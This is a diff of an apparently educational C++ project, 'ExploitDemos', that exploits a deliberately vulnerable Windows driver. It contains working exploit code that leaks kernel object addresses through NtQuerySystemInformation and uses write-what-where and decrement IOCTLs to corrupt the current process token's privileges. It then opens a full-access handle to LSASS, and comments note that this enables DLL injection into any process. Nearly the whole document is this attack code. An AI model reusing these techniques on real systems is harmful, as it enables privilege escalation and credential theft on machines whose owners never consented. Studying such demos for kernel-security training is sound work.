+ printf("+ Overwriting address: 0x%p\n", dataCopy->Dest);
+
+ bRc = DeviceIoControl(hDevice,
+ (DWORD)IOCTL_KDEXPLOITME_METHOD_WRITEWHATWHERE,
+ dataCopy,
+ sizeof(*dataCopy),
+ ioctlDest, //Won't actually be used in this exploit
+ overwriteSize,
+ &bytesReturned,
+ NULL
+ );
+
+
+ if (!bRc)
+ {
+ printf("- Error in DeviceIoControl : %d\n", GetLastError());
+ goto Cleanup;
+ }
+ }
+
+
+ //Attempt to get a handle to LSASS, which is normally not possible, but should be possible after running the exploit
+ hLsass = OpenProcess(PROCESS_ALL_ACCESS, false, processId);
+ if (!hLsass)
+ {
+ printf("- Error opening a HANDLE to LSASS. Error code: 0x%x\n", GetLastError());
+ goto Cleanup;
+ }
+ printf("+ Successfully opened a full access handle to LSASS. Exploit worked!.\n");
+
+
+ functionSuccess = true;
+
+Cleanup:
+ if (objectAddresses)
+ {
+ free(objectAddresses);
+ objectAddresses = NULL;
+ }
+ if (ioctlSrc)
+ {
+ free(ioctlSrc);
+ ioctlSrc = NULL;
+ }
+ if (ioctlDest)
+ {
+ free(ioctlDest);
+ ioctlDest = NULL;
+ }
+ if (dataCopy)
+ {
+ delete dataCopy;
+ dataCopy = NULL;
+ }
+ if (hLsass)
+ {
+ CloseHandle(hLsass);
+ hLsass = NULL;
+ }
+
+ return functionSuccess;
+}
+
+// This will decrement the privileges held by the current process by 1. This will effectively turn on almost all privileges
+// for the process, including SeDebugPrivilege. With SeDebugPrivilege, you can do DLL injection in to any process.
+// See https://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf
+// Test on Windows 6.1 x86/x64
+BOOL AttackDecAddress(HANDLE hDevice)
+{
+ BOOL functionSuccess = false;
+ PVOID tokenAddress = NULL;
+ PVOID privilegeAddress = NULL;
+ BOOL success = false;
+ size_t ioctlDest = 0;
+ DWORD bytesReturned = 0;
+ DECADDRESS inBuf = { 0 };
+ HANDLE hLsass = NULL;
+ DWORD lsassProcId = 0;
+
+ success = LeakCurrentUserTokenAddress(&tokenAddress);
+ if (!success)
+ {
+ printf("- Error calling LeakCurrentUserTokenAddress.\n");
+ goto Cleanup;
+ }
+
+ privilegeAddress = (PVOID)((UINT_PTR)tokenAddress + 0x48);
+
+ inBuf.Value = (size_t*)privilegeAddress;
+ inBuf.Dec = TRUE;
+
+ printf("+ Decrementing memory at address: 0x%p\n", inBuf.Value);
+
+ BOOL bRc = DeviceIoControl(hDevice,
+ (DWORD)IOCTL_KDEXPLOITME_METHOD_DECADDRESS,
+ &inBuf,
+ sizeof(inBuf),
+ &ioctlDest, //Won't actually be used in this exploit
+ sizeof(ioctlDest),
+ &bytesReturned,
+ NULL
+ );
+
+ if (!bRc)
+ {
+ printf("- Error in DeviceIoControl : %d\n", GetLastError());
+ goto Cleanup;
+ }
+
+ //Get the process ID of lsass
+ success = GetProcessIdByName(L"lsass.exe", &lsassProcId);
+ if (!success)
+ {
+ printf("- Failed to get process by name.\n");
+ goto Cleanup;
+ }
+ printf("+ Process ID of LSASS: 0x%x\n", lsassProcId);
+
+ //Attempt to get a handle to LSASS, which is normally not possible, but should be possible after running the exploit
+ hLsass = OpenProcess(PROCESS_ALL_ACCESS, false, lsassProcId);
+ if (!hLsass)
+ {
+ printf("- Error opening a HANDLE to LSASS. Error code: 0x%x\n", GetLastError());
+ goto Cleanup;
+ }
+ printf("+ Successfully opened a full access handle to LSASS. Exploit worked!.\n");
+
+ functionSuccess = true;
+
+Cleanup:
+ if (hLsass)
+ {
+ CloseHandle(hLsass);
+ hLsass = NULL;
+ }
+
+ return functionSuccess;
+}
diff --git a/ExploitDemos/GenericAttacks.h b/ExploitDemos/GenericAttacks.h
index 2f4346f..796737b 100644
--- a/ExploitDemos/GenericAttacks.h
+++ b/ExploitDemos/GenericAttacks.h
@@ -1,7 +1,7 @@
-#pragma once
-
-#include "stdafx.h"
-
-
-BOOL AttackWriteWhatWhere(HANDLE hDevice);
+#pragma once
+
+#include "stdafx.h"
+
+
+BOOL AttackWriteWhatWhere(HANDLE hDevice);
BOOL AttackDecAddress(HANDLE hDevice);
\ No newline at end of file
diff --git a/ExploitDemos/Helpers.cpp b/ExploitDemos/Helpers.cpp
index 347f7bb..a6a2511 100644
--- a/ExploitDemos/Helpers.cpp
+++ b/ExploitDemos/Helpers.cpp
@@ -1,45 +1,45 @@
-#pragma once
-#include "stdafx.h"
-#include "Helpers.h"
-
-BOOL VersionCheck(UINT32 maxMajorVersion, UINT32 maxMinorVersion, UINT32 minMajorVersion, UINT32 minMinorVersion, ArchitectureType architectureRequired)
-{
- OSVERSIONINFO osVersionInfo = { 0 };
- osVersionInfo.dwOSVersionInfoSize = sizeof(osVersionInfo);
-
- if (!GetVersionEx(&osVersionInfo))
- {
- //printf("- Error: Unable to call GetVersionEx.\n");
- return false;
- }
-
- if (!(osVersionInfo.dwMajorVersion >= minMajorVersion && osVersionInfo.dwMajorVersion <= maxMajorVersion))
- {
- //printf(" - Attempting to run exploit on unsupported OS version.\n");
- return false;
- }
-
-
- if (!((osVersionInfo.dwMajorVersion == minMajorVersion && osVersionInfo.dwMinorVersion >= minMinorVersion)
- || (osVersionInfo.dwMajorVersion == maxMajorVersion && osVersionInfo.dwMinorVersion <= maxMinorVersion)))
- {
- //printf(" - Attempting to run exploit on unsupported OS version.\n");
- return false;
- }
-
-#ifdef _WIN64
- if (!(architectureRequired == AnyArchitecture || architectureRequired == AMD64))
- {
- //printf(" - Attempting to run exploit on unsupported OS version.\n");
- return false;
- }
-#else
- if (!(architectureRequired == AnyArchitecture || architectureRequired == X86))
- {
- //printf(" - Attempting to run exploit on unsupported OS version.\n");
- return false;
- }
-#endif
-
- return true;
+#pragma once
+#include "stdafx.h"
+#include "Helpers.h"
+
+BOOL VersionCheck(UINT32 maxMajorVersion, UINT32 maxMinorVersion, UINT32 minMajorVersion, UINT32 minMinorVersion, ArchitectureType architectureRequired)
+{
+ OSVERSIONINFO osVersionInfo = { 0 };
+ osVersionInfo.dwOSVersionInfoSize = sizeof(osVersionInfo);
+
+ if (!GetVersionEx(&osVersionInfo))
+ {
+ //printf("- Error: Unable to call GetVersionEx.\n");
+ return false;
+ }
+
+ if (!(osVersionInfo.dwMajorVersion >= minMajorVersion && osVersionInfo.dwMajorVersion <= maxMajorVersion))
+ {
+ //printf(" - Attempting to run exploit on unsupported OS version.\n");
+ return false;
+ }
+
+
+ if (!((osVersionInfo.dwMajorVersion == minMajorVersion && osVersionInfo.dwMinorVersion >= minMinorVersion)
+ || (osVersionInfo.dwMajorVersion == maxMajorVersion && osVersionInfo.dwMinorVersion <= maxMinorVersion)))
+ {
+ //printf(" - Attempting to run exploit on unsupported OS version.\n");
+ return false;
+ }
+
+#ifdef _WIN64
+ if (!(architectureRequired == AnyArchitecture || architectureRequired == AMD64))
+ {
+ //printf(" - Attempting to run exploit on unsupported OS version.\n");
+ return false;
+ }
+#else
+ if (!(architectureRequired == AnyArchitecture || architectureRequired == X86))
+ {
+ //printf(" - Attempting to run exploit on unsupported OS version.\n");
+ return false;
+ }
+#endif
+
+ return true;
}
\ No newline at end of file
diff --git a/ExploitDemos/Helpers.h b/ExploitDemos/Helpers.h
index 007fa86..5cdee13 100644
--- a/ExploitDemos/Helpers.h
+++ b/ExploitDemos/Helpers.h
@@ -1,12 +1,12 @@
-#pragma once
-#pragma warning(disable: 4996) /* GetVersionInfoW is deprecated */
-#include "stdafx.h"
-
-typedef enum ArchitectureType
-{
- AnyArchitecture,
- X86,
- AMD64
-};
-
+#pragma once
+#pragma warning(disable: 4996) /* GetVersionInfoW is deprecated */
+#include "stdafx.h"
+
+typedef enum ArchitectureType
+{
+ AnyArchitecture,
+ X86,
+ AMD64
+};
+
BOOL VersionCheck(UINT32 maxMajorVersion, UINT32 maxMinorVersion, UINT32 minMajorVersion, UINT32 minMinorVersion, ArchitectureType architectureRequired);
\ No newline at end of file
diff --git a/ExploitDemos/KernelAddressLeak.cpp b/ExploitDemos/KernelAddressLeak.cpp
index 4c2e9c4..9a5b300 100644
--- a/ExploitDemos/KernelAddressLeak.cpp
+++ b/ExploitDemos/KernelAddressLeak.cpp
@@ -1,345 +1,345 @@
-#pragma once
-#include "stdafx.h"
-#include "KernelAddressLeak.h"
-
-
-//Helper functions
-bool GetOSVersion(DWORD* majorVersion, DWORD* minorVersion);
-BOOL QueryNtHandles(PSYSTEM_HANDLE_INFORMATION_EX* handleInfo);
-
-
-
-//Returns true on success (and sets majorVersion and minorVersion). Returns false on failure.
-bool GetOSVersion(DWORD* majorVersion, DWORD* minorVersion)
-{
- bool success = false;
-
- if (IsWindowsVistaOrGreater())
- {
- success = true;
- *majorVersion = 6;
- *minorVersion = 0;
- }
- if (IsWindows7OrGreater())
- {
- *minorVersion = 1;
- }
- if (IsWindows8OrGreater())
- {
- *minorVersion = 2;
- }
- if (IsWindows8Point1OrGreater())
- {
- *minorVersion = 3;
- }
-
- return success;
-}
-
-BOOL QueryNtHandles(PSYSTEM_HANDLE_INFORMATION_EX* handleInfo)
-{
- BOOL functionSuccess = false;
- ULONG handleInfoSize = sizeof(SYSTEM_HANDLE_INFORMATION_EX)+(sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX)* 10000);
- NTSTATUS status = STATUS_INFO_LENGTH_MISMATCH; //Make status be an error so the loop starts.
- *handleInfo = NULL;
-
- HMODULE hModule = LoadLibraryW(L"ntdll.dll");
- tNtQuerySystemInformation pNtQuerySystemInformation = (tNtQuerySystemInformation)GetProcAddress(hModule, "NtQuerySystemInformation");
- FreeLibrary(hModule);
- if (pNtQuerySystemInformation == NULL)
- {
- printf("- Error: Cannot retrieve NtQuerySystemInformation address.\n");
- goto Cleanup;
- }
-
- ULONG requiredSize = 0;
- while (status == STATUS_INFO_LENGTH_MISMATCH)
- {
- if (*handleInfo)
- {
- free(*handleInfo);
- }
-
- //Allocate space for NtQuerySystemInformation and call it
- *handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)malloc(handleInfoSize);
- ZeroMemory(*handleInfo, handleInfoSize);
- status = (*pNtQuerySystemInformation)(SystemExtendedHandleInformation, *handleInfo, handleInfoSize, &requiredSize);
- //If there isn't enough space in the buffer, increase the buffer size
- if (NT_SUCCESS(status))
- {
- break;
- }
- else if (status == STATUS_INFO_LENGTH_MISMATCH)
- {
- ULONG additionalSpace = sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX)* 1000;
- if (ULONG_MAX - additionalSpace < requiredSize)
- {
- printf("- Error: Looping error increasing buffersize for NtQuerySystemInformation.\n");
- goto Cleanup;
- }
-
- handleInfoSize = requiredSize + additionalSpace;
- }
- else
- {
- printf("- Error: Unexpected error from NtQuerySystemInformation. Error: 0x%x\n", status);
- goto Cleanup;
- }
- }
-
- printf("+ QueryNtHandles returning success: NtQuerySystemInformation returned %i entries.\n", (*handleInfo)->NumberOfHandles);
- functionSuccess = true;
-
-Cleanup:
- if (!functionSuccess)
- {
- if (*handleInfo)
- {
- free(*handleInfo);
- *handleInfo = NULL;
- }
- }
-
- return functionSuccess;
-}
-
-
-BOOL LeakProcessObjectAddresses(HANDLE processId, PVOID** objectAddresses, size_t* objectCount)
-{
- BOOL functionSuccess = false;
-
- *objectAddresses = NULL;
- *objectCount = 0;
-
- NTSTATUS status = 0;
- PSYSTEM_HANDLE_INFORMATION_EX handleInfo = NULL;
- USHORT processTypeIndex = 0;
- HANDLE hCurrentProc = NULL;
-
- //Get a real handle to the current process
- DWORD currentProcId = GetCurrentProcessId();
- hCurrentProc = OpenProcess(PROCESS_QUERY_INFORMATION, false, currentProcId);
- if (hCurrentProc == NULL)
- {
- printf("- Unable to call OpenProcess for current process. Error code: 0x%p. Current process Id: %i", hCurrentProc, currentProcId);
- goto Cleanup;
- }
-
- if (!QueryNtHandles(&handleInfo))
- {
- printf("- Error calling QueryNtHandles to retrieve kernel handles info.");
- goto Cleanup;
- }
-
- size_t numRetrievedHandles = handleInfo->NumberOfHandles;
- PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX handleEntry = handleInfo->Handles;
-
- //Need to determine what the ObjectTypeIndex value is for a process handle.
- //To do this, look for the process handle of the current process (that was opened earlier) in our current process and look at its ObjectIndexType.
- for (size_t i = 0; i < numRetrievedHandles; i++)
- {
- if ((handleEntry->UniqueProcessId == (HANDLE)currentProcId) && (handleEntry->HandleValue == hCurrentProc))
- {
- processTypeIndex = handleEntry->ObjectTypeIndex;
- break;
- }
-
- handleEntry++;
- }
-
- if (processTypeIndex == 0)
- {
- printf("- Unable to determine the ObjectTypeIndex for PROCESS objects.\n");
- goto Cleanup;
- }
- printf("+ Found ObjectTypeIndex for PROCESS objects: 0x%x\n", processTypeIndex);
-
- //Loop through the target remote process and find PROCESS objects
- handleEntry = handleInfo->Handles; //Reset this pointer
- printf("+ Total handles retrieved: %i\n", numRetrievedHandles);
- size_t numTargetHandles = 0;
- for (size_t i = 0; i < numRetrievedHandles; i++)
- {
- if (handleEntry->UniqueProcessId == processId && handleEntry->ObjectTypeIndex == processTypeIndex)
- {
- numTargetHandles++;
- //printf("= Process ID: 0x%x, Handle value: 0x%x, ObjectID: 0x%x, Address: 0x%x\n", handleEntry->UniqueProcessId, handleEntry->HandleValue, handleEntry->ObjectTypeIndex, handleEntry->Object);
- }
-
- handleEntry++;
- }
-
- //Allocate space for the needed handles.
- *objectAddresses = (PVOID*)malloc(numTargetHandles * sizeof(PVOID));
- *objectCount = numTargetHandles;
-
- handleEntry = handleInfo->Handles; //Reset this pointer
- //Fill in an array of pointers. Each pointer points to a PROCESS structure in kernel mode that the target process has an open handle to.
- for (size_t i = 0, objectArrayIndex = 0; i < numRetrievedHandles; i++)
- {
- if (handleEntry->UniqueProcessId == processId && handleEntry->ObjectTypeIndex == processTypeIndex)
- {
- (*objectAddresses)[objectArrayIndex] = handleEntry->Object;
- objectArrayIndex++;
- }
-
- handleEntry++;
- }
-
-
- functionSuccess = true;
-
-Cleanup:
- if (hCurrentProc)
- {
- CloseHandle(hCurrentProc);
- hCurrentProc = NULL;
- }
- if (handleInfo)
- {
- free(handleInfo);
- handleInfo = NULL;
- }
- if (!functionSuccess)
- {
- if (*objectAddresses)
- {
- free(*objectAddresses);
- *objectAddresses = NULL;
- *objectCount = 0;
- }
- }
-
- return functionSuccess;
-}
-
-
-BOOL LeakAddressOfObjectByHandleInProcess(HANDLE hHandle, PVOID* tokenAddress)
-{
- BOOL functionSuccess = false;
- PSYSTEM_HANDLE_INFORMATION_EX handleInfo = NULL;
- DWORD currentProcessId = 0;
- BOOL success = false;
-
- currentProcessId = GetCurrentProcessId();
-
- if (hHandle == NULL)
- {
- printf("- Error: hHandle cannot be NULL\n");
- goto Cleanup;
- }
-
- //Get all kernel handles
- if (!QueryNtHandles(&handleInfo))
- {
- printf("- Error calling QueryNtHandles to retrieve kernel handles info.\n");
- goto Cleanup;
- }
-
- //Find the current token from the handles retrieved
- printf("+ Retrieved all kernel handles. Looking for the address of the supplied token.\n");
- size_t numRetrievedHandles = handleInfo->NumberOfHandles;
- PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX handleEntry = handleInfo->Handles;
- for (size_t i = 0; i < numRetrievedHandles; i++)
- {
- if (handleEntry->UniqueProcessId == (HANDLE)currentProcessId && handleEntry->HandleValue == hHandle)
- {
- *tokenAddress = handleEntry->Object;
- printf("+ The address of the hHandle object is: 0x%p\n", *tokenAddress);
- functionSuccess = true;
- goto Cleanup;
- }
-
- handleEntry++;
- }
-
- printf("- Error trying to locate hHandle in the returned kernel handles.\n");
-
-Cleanup:
- if (handleInfo)
- {
- free(handleInfo);
- handleInfo = NULL;
- }
-
- return functionSuccess;
-}
-
-
-BOOL LeakCurrentUserTokenAddress(PVOID* tokenAddress)
-{
- BOOL functionSuccess = false;
- DWORD currentProcessId = 0;
- HANDLE hCurrentProcess = NULL;
- HANDLE hProcessToken = NULL;
-
- //Obtain a token for the current process
- currentProcessId = GetCurrentProcessId();
- hCurrentProcess = OpenProcess(PROCESS_QUERY_INFORMATION, false, currentProcessId);
- if (!hCurrentProcess)
- {
- printf("- Error opening current process. Error code: 0x%x\n", GetLastError());
- goto Cleanup;
- }
-
- functionSuccess = OpenProcessToken(hCurrentProcess, TOKEN_QUERY, &hProcessToken);
- if (!functionSuccess)
- {
- printf("- Error opening process token. Error code: 0x%x\n", GetLastError());
- goto Cleanup;
- }
- printf("+ Obtained a handle to the current process token.\n");
-
- functionSuccess = LeakAddressOfObjectByHandleInProcess(hProcessToken, tokenAddress);
-
-Cleanup:
- if (hCurrentProcess)
- {
- CloseHandle(hCurrentProcess);
- hCurrentProcess = NULL;
- }
- if (hProcessToken)
- {
- CloseHandle(hProcessToken);
- hProcessToken = NULL;
- }
-
- return functionSuccess;
-}
-
-
-BOOL GetProcessIdByName(LPCWSTR processName, DWORD* processId)
-{
- PROCESSENTRY32 processEntry = { 0 };
- processEntry.dwSize = sizeof(PROCESSENTRY32);
- BOOL returnValue = false;
-
- HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
- if (!hSnapshot)
- {
- goto Cleanup;
- }
-
- BOOL success = Process32FirstW(hSnapshot, &processEntry);
-
- while (success)
- {
- if (_wcsicmp(processName, processEntry.szExeFile) == 0)
- {
- *processId = processEntry.th32ProcessID;
- returnValue = true;
- goto Cleanup;
- }
-
- success = Process32Next(hSnapshot, &processEntry);
- }
-
-Cleanup:
- if (hSnapshot)
- {
- CloseHandle(hSnapshot);
- hSnapshot = NULL;
- }
-
- return returnValue;
+#pragma once
+#include "stdafx.h"
+#include "KernelAddressLeak.h"
+
+
+//Helper functions
+bool GetOSVersion(DWORD* majorVersion, DWORD* minorVersion);
+BOOL QueryNtHandles(PSYSTEM_HANDLE_INFORMATION_EX* handleInfo);
+
+
+
+//Returns true on success (and sets majorVersion and minorVersion). Returns false on failure.
+bool GetOSVersion(DWORD* majorVersion, DWORD* minorVersion)
+{
+ bool success = false;
+
+ if (IsWindowsVistaOrGreater())
+ {
+ success = true;
+ *majorVersion = 6;
+ *minorVersion = 0;
+ }
+ if (IsWindows7OrGreater())
+ {
+ *minorVersion = 1;
+ }
+ if (IsWindows8OrGreater())
+ {
+ *minorVersion = 2;
+ }
+ if (IsWindows8Point1OrGreater())
+ {
+ *minorVersion = 3;
+ }
+
+ return success;
+}
+
+BOOL QueryNtHandles(PSYSTEM_HANDLE_INFORMATION_EX* handleInfo)
+{
+ BOOL functionSuccess = false;
+ ULONG handleInfoSize = sizeof(SYSTEM_HANDLE_INFORMATION_EX)+(sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX)* 10000);
+ NTSTATUS status = STATUS_INFO_LENGTH_MISMATCH; //Make status be an error so the loop starts.
+ *handleInfo = NULL;
+
+ HMODULE hModule = LoadLibraryW(L"ntdll.dll");
+ tNtQuerySystemInformation pNtQuerySystemInformation = (tNtQuerySystemInformation)GetProcAddress(hModule, "NtQuerySystemInformation");
+ FreeLibrary(hModule);
+ if (pNtQuerySystemInformation == NULL)
+ {
+ printf("- Error: Cannot retrieve NtQuerySystemInformation address.\n");
+ goto Cleanup;
+ }
+
+ ULONG requiredSize = 0;
+ while (status == STATUS_INFO_LENGTH_MISMATCH)
+ {
+ if (*handleInfo)
+ {
+ free(*handleInfo);
+ }
+
+ //Allocate space for NtQuerySystemInformation and call it
+ *handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)malloc(handleInfoSize);
+ ZeroMemory(*handleInfo, handleInfoSize);
+ status = (*pNtQuerySystemInformation)(SystemExtendedHandleInformation, *handleInfo, handleInfoSize, &requiredSize);
+ //If there isn't enough space in the buffer, increase the buffer size
+ if (NT_SUCCESS(status))
+ {
+ break;
+ }
+ else if (status == STATUS_INFO_LENGTH_MISMATCH)
+ {
+ ULONG additionalSpace = sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX)* 1000;
+ if (ULONG_MAX - additionalSpace < requiredSize)
+ {
+ printf("- Error: Looping error increasing buffersize for NtQuerySystemInformation.\n");
+ goto Cleanup;
+ }
+
+ handleInfoSize = requiredSize + additionalSpace;
+ }
+ else
+ {
+ printf("- Error: Unexpected error from NtQuerySystemInformation. Error: 0x%x\n", status);
+ goto Cleanup;
+ }
+ }
+
+ printf("+ QueryNtHandles returning success: NtQuerySystemInformation returned %i entries.\n", (*handleInfo)->NumberOfHandles);
+ functionSuccess = true;
+
+Cleanup:
+ if (!functionSuccess)
+ {
+ if (*handleInfo)
+ {
+ free(*handleInfo);
+ *handleInfo = NULL;
+ }
+ }
+
+ return functionSuccess;
+}
+
+
+BOOL LeakProcessObjectAddresses(HANDLE processId, PVOID** objectAddresses, size_t* objectCount)
+{
+ BOOL functionSuccess = false;
+
+ *objectAddresses = NULL;
+ *objectCount = 0;
+
+ NTSTATUS status = 0;
+ PSYSTEM_HANDLE_INFORMATION_EX handleInfo = NULL;
+ USHORT processTypeIndex = 0;
+ HANDLE hCurrentProc = NULL;
+
+ //Get a real handle to the current process
+ DWORD currentProcId = GetCurrentProcessId();
+ hCurrentProc = OpenProcess(PROCESS_QUERY_INFORMATION, false, currentProcId);
+ if (hCurrentProc == NULL)
+ {
+ printf("- Unable to call OpenProcess for current process. Error code: 0x%p. Current process Id: %i", hCurrentProc, currentProcId);
+ goto Cleanup;
+ }
+
+ if (!QueryNtHandles(&handleInfo))
+ {
+ printf("- Error calling QueryNtHandles to retrieve kernel handles info.");
+ goto Cleanup;
+ }
+
+ size_t numRetrievedHandles = handleInfo->NumberOfHandles;
+ PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX handleEntry = handleInfo->Handles;
+
+ //Need to determine what the ObjectTypeIndex value is for a process handle.
+ //To do this, look for the process handle of the current process (that was opened earlier) in our current process and look at its ObjectIndexType.
+ for (size_t i = 0; i < numRetrievedHandles; i++)
+ {
+ if ((handleEntry->UniqueProcessId == (HANDLE)currentProcId) && (handleEntry->HandleValue == hCurrentProc))
+ {
+ processTypeIndex = handleEntry->ObjectTypeIndex;
+ break;
+ }
+
+ handleEntry++;
+ }
+
+ if (processTypeIndex == 0)
+ {
+ printf("- Unable to determine the ObjectTypeIndex for PROCESS objects.\n");
+ goto Cleanup;
+ }
+ printf("+ Found ObjectTypeIndex for PROCESS objects: 0x%x\n", processTypeIndex);
+
+ //Loop through the target remote process and find PROCESS objects
+ handleEntry = handleInfo->Handles; //Reset this pointer
+ printf("+ Total handles retrieved: %i\n", numRetrievedHandles);
+ size_t numTargetHandles = 0;
+ for (size_t i = 0; i < numRetrievedHandles; i++)
+ {
+ if (handleEntry->UniqueProcessId == processId && handleEntry->ObjectTypeIndex == processTypeIndex)
+ {
+ numTargetHandles++;
+ //printf("= Process ID: 0x%x, Handle value: 0x%x, ObjectID: 0x%x, Address: 0x%x\n", handleEntry->UniqueProcessId, handleEntry->HandleValue, handleEntry->ObjectTypeIndex, handleEntry->Object);
+ }
+
+ handleEntry++;
+ }
+
+ //Allocate space for the needed handles.
+ *objectAddresses = (PVOID*)malloc(numTargetHandles * sizeof(PVOID));
+ *objectCount = numTargetHandles;
+
+ handleEntry = handleInfo->Handles; //Reset this pointer
+ //Fill in an array of pointers. Each pointer points to a PROCESS structure in kernel mode that the target process has an open handle to.
+ for (size_t i = 0, objectArrayIndex = 0; i < numRetrievedHandles; i++)
+ {
+ if (handleEntry->UniqueProcessId == processId && handleEntry->ObjectTypeIndex == processTypeIndex)
+ {
+ (*objectAddresses)[objectArrayIndex] = handleEntry->Object;
+ objectArrayIndex++;
+ }
+
+ handleEntry++;
+ }
+
+
+ functionSuccess = true;
+
+Cleanup:
+ if (hCurrentProc)
+ {
+ CloseHandle(hCurrentProc);
+ hCurrentProc = NULL;
+ }
+ if (handleInfo)
+ {
+ free(handleInfo);
+ handleInfo = NULL;
+ }
+ if (!functionSuccess)
+ {
+ if (*objectAddresses)
+ {
+ free(*objectAddresses);
+ *objectAddresses = NULL;
+ *objectCount = 0;
+ }
+ }
+
+ return functionSuccess;
+}
+
+
+BOOL LeakAddressOfObjectByHandleInProcess(HANDLE hHandle, PVOID* tokenAddress)
+{
+ BOOL functionSuccess = false;
+ PSYSTEM_HANDLE_INFORMATION_EX handleInfo = NULL;
+ DWORD currentProcessId = 0;
+ BOOL success = false;
+
+ currentProcessId = GetCurrentProcessId();
+
+ if (hHandle == NULL)
+ {
+ printf("- Error: hHandle cannot be NULL\n");
+ goto Cleanup;
+ }
+
+ //Get all kernel handles
+ if (!QueryNtHandles(&handleInfo))
+ {
+ printf("- Error calling QueryNtHandles to retrieve kernel handles info.\n");
+ goto Cleanup;
+ }
+
+ //Find the current token from the handles retrieved
+ printf("+ Retrieved all kernel handles. Looking for the address of the supplied token.\n");
+ size_t numRetrievedHandles = handleInfo->NumberOfHandles;
+ PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX handleEntry = handleInfo->Handles;
+ for (size_t i = 0; i < numRetrievedHandles; i++)
+ {
+ if (handleEntry->UniqueProcessId == (HANDLE)currentProcessId && handleEntry->HandleValue == hHandle)
+ {
+ *tokenAddress = handleEntry->Object;
+ printf("+ The address of the hHandle object is: 0x%p\n", *tokenAddress);
+ functionSuccess = true;
+ goto Cleanup;
+ }
+
+ handleEntry++;
+ }
+
+ printf("- Error trying to locate hHandle in the returned kernel handles.\n");
+
+Cleanup:
+ if (handleInfo)
+ {
+ free(handleInfo);
+ handleInfo = NULL;
+ }
+
+ return functionSuccess;
+}
+
+
+BOOL LeakCurrentUserTokenAddress(PVOID* tokenAddress)
+{
+ BOOL functionSuccess = false;
+ DWORD currentProcessId = 0;
+ HANDLE hCurrentProcess = NULL;
+ HANDLE hProcessToken = NULL;
+
+ //Obtain a token for the current process
+ currentProcessId = GetCurrentProcessId();
+ hCurrentProcess = OpenProcess(PROCESS_QUERY_INFORMATION, false, currentProcessId);
+ if (!hCurrentProcess)
+ {
+ printf("- Error opening current process. Error code: 0x%x\n", GetLastError());
+ goto Cleanup;
+ }
+
+ functionSuccess = OpenProcessToken(hCurrentProcess, TOKEN_QUERY, &hProcessToken);
+ if (!functionSuccess)
+ {
+ printf("- Error opening process token. Error code: 0x%x\n", GetLastError());
+ goto Cleanup;
+ }
+ printf("+ Obtained a handle to the current process token.\n");
+
+ functionSuccess = LeakAddressOfObjectByHandleInProcess(hProcessToken, tokenAddress);
+
+Cleanup:
+ if (hCurrentProcess)
+ {
+ CloseHandle(hCurrentProcess);
+ hCurrentProcess = NULL;
+ }
+ if (hProcessToken)
+ {
+ CloseHandle(hProcessToken);
+ hProcessToken = NULL;
+ }
+
+ return functionSuccess;
+}
+
+
+BOOL GetProcessIdByName(LPCWSTR processName, DWORD* processId)
+{
+ PROCESSENTRY32W processEntry = { 0 };
+ processEntry.dwSize = sizeof(PROCESSENTRY32W);
+ BOOL returnValue = false;
+
+ HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+ if (!hSnapshot)
+ {
+ goto Cleanup;
+ }
+
+ BOOL success = Process32FirstW(hSnapshot, &processEntry);
+
+ while (success)
+ {
+ if (_wcsicmp(processName, processEntry.szExeFile) == 0)
+ {
+ *processId = processEntry.th32ProcessID;
+ returnValue = true;
+ goto Cleanup;
+ }
+
+ success = Process32NextW(hSnapshot, &processEntry);
+ }
+
+Cleanup:
+ if (hSnapshot)
+ {
+ CloseHandle(hSnapshot);
+ hSnapshot = NULL;
+ }
+
+ return returnValue;
}
\ No newline at end of file
diff --git a/ExploitDemos/KernelAddressLeak.h b/ExploitDemos/KernelAddressLeak.h
index 523fd44..911b9b5 100644
--- a/ExploitDemos/KernelAddressLeak.h
+++ b/ExploitDemos/KernelAddressLeak.h
@@ -1,72 +1,72 @@
-#pragma once
-#include "stdafx.h"
-
-#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
-
-// Function: LeakProcessObjectAddresses
-// Description: Leaks the kernel address of every EPROCESS object the specific process (indicated by processId) has a HANDLE to.
-// Parameters:
-// processId - The Process ID to enumerate (will enumerate the EPROCESS objects that this process has a HANDLE to).
-// objectAddresses - Pointer to an array of PVOID. Each PVOID is a kernel address. Must be freed by the caller.
-// objectCount - The number of object addresses returned in the objectAddresses array.
-// Returns:
-// Success: Returns TRUE. objectAddresses and objectCount is set.
-// Failure: Returns FALSE. objectAddresses is set to NULL and objectCount is set to 0.
-BOOL LeakProcessObjectAddresses(HANDLE processId, PVOID** objectAddresses, size_t* objectCount);
-
-// Function: LeakCurrentUserTokenAddress
-// Description: Leaks the kernel address of the logon token object of the current process.
-// Parameters:
-// tokenAddress - Pointer to the kernel address of the token object.
-// Returns:
-// Success: Returns TRUE. tokenAddress is set.
-// Failure: Returns FALSE. tokenAddress is set to NULL.
-BOOL LeakCurrentUserTokenAddress(PVOID* tokenAddress);
-
-// Function: LeakAddressOfByHandleInProcess
-// Description: Leaks the kernel address of a kernel object that the current process has a HANDLE to.
-// Parameters:
-// hHandle - Handle to the object to find the address of.
-// tokenAddress - Pointer to the kernel address of the token object.
-// Returns:
-// Success: Returns TRUE. tokenAddress is set.
-// Failure: Returns FALSE. tokenAddress is set to NULL.
-BOOL LeakAddressOfObjectByHandleInProcess(HANDLE hHandle, PVOID* tokenAddress);
-
-// Function: GetProcessIdByName
-// Description: Uses processName to return a corrosponding Process ID.
-// If there are multiple processes with the same name, it is undefined which ID is returned.
-// Parameters:
-// processName - The process name to retrieve an ID for.
-// processId - A pointer to a DWORD that will be filled by the function with the retrieved Process ID.
-// Returns:
-// Success: Returns TRUE. tokenAddress will be set.
-// Failure: Returns FALSE.
-BOOL GetProcessIdByName(LPCWSTR processName, DWORD* processId);
-
-
-//
-// Windows structures
-//
